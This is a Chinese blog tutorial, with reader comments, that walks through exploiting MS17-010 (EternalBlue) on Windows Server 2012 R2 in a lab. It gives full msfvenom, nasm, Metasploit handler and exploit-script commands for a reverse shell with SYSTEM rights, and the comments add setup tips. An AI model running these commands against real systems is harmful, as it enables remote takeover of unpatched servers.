Kali对Windows2012的MS17010漏洞测试

Kali - The Vulnerablity of MS17010 for Windows Server 2012 R2


        本文将复现MS17010漏洞在Windows Server 2012 R2系统下的利用过程,通过使用msf生成的shell以及github上的exp生成的二进制文件相拼接,从而生成一个完整的二进制文件,注入到远程主机的系统进程中。


测试环境


kali linux 2017 x32(attacker)

Windows Server 2012 R2(victim)


准备工作


首先下载相关的PoC

下载eternalblue_kshellcode_x64.asm

下载eternalblue_exploit8.py

相关资源在此不显示,需要者请在评论区留言



操作步骤


1.编译汇编文件

nasm -f bin eternalblue_kshellcode_x64.asm

此命令在本目录下生成对应二进制文件eternalblue_kshellcode_x64

2.生成msf的payload

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread  LHOST=192.168.254.128 LPORT=4444

-p 指定msf生成的payload的类型

-f  payload的类型

-o 输出的payload的文件名

EXITFUNC 指定这个payload的退出函数

LHOST 本机IP,应使用ifconfig查看kali的IP

LPORT 本机端口,后续payload将连接kali的这个端口

3.组装汇编文件和payload为专用shellcode

cat eternalblue_kshellcode_x64 shell_msf.bin > reverse_shell.bin

reverse_shell.bin为生成的完整shellcode

注:这种组装方式的原理可以查看asm文件,最后一行有注释,后面是自定义的代码,那么拼接payload之后,payload代码将被执行

4.在msf上使用exploit/multi/handler模块

use exploit/multi/handler

5.设置相应的payload,与之前msfvenom命令生成的payload一定要相同

6.设置相应的参数,一定要与msfvenom命令中的参数一致,否则会造成victim蓝屏,设置好之后启动监听

set EXITFUNC thread

set lhost 192.168.254.128

run

192.168.254.128是本次实验的kali系统IP,进行操作时应先使用ifconfig获取本机的IP

7.启动利用程序

python eternalblue_exploit8.py 192.168.254.129 reverse_shell.bin

eternalblue_exploit8.py 利用程序的文件名

192.168.254.129 victim的IP

reverse_shell.bin shellcode文件

8.成功获取对方的session

利用程序显示done之后,msf会监听到一个session

使用以下方法查看已连接的session

sessions -i

9.连入对方机器

sessions -i 1

-i后面的参数为session的Id

此时获取的已经是system权限


MS17010官方详情

版权所有:《mntm博客》 => 《Kali对Windows2012的MS17010漏洞测试
本文地址:http://www.mntm520.com/post/37
除非注明,文章均为 《mntm博客》 原创,欢迎转载!转载请注明本文地址,谢谢。

暧昧贴

发表评论

    微笑 大笑 拽 大哭 奸笑 流汗 喷血 生气 囧 不爽 晕 示爱 卖萌 吃惊 迷离 爱你 吓死了 呵呵

      已有4条评论

    1. avatar beiyan板凳
      我可以找博主拿一份 eternalblue_kshellcode_x64.asm
      eternalblue_exploit8.py 的资源吗
      2019-09-11 14:03 回复
      1. avatarmntm
        回复了beiyan:github上很容易找到
        https://github.com/worawit/MS17-010
        2019-09-11 22:25 回复
    2. avatar wll沙发
      shishi试试看2019-01-15 10:15 回复
      1. avatarmntm
        回复了wll:注意一下环境哦,win8/2012的要求比较苛刻,你需要激活Guest账号,并且至少要有一个共享目录,当然,不要忘了在py程序里面填写账号Guest和密码空 2019-01-15 16:28 回复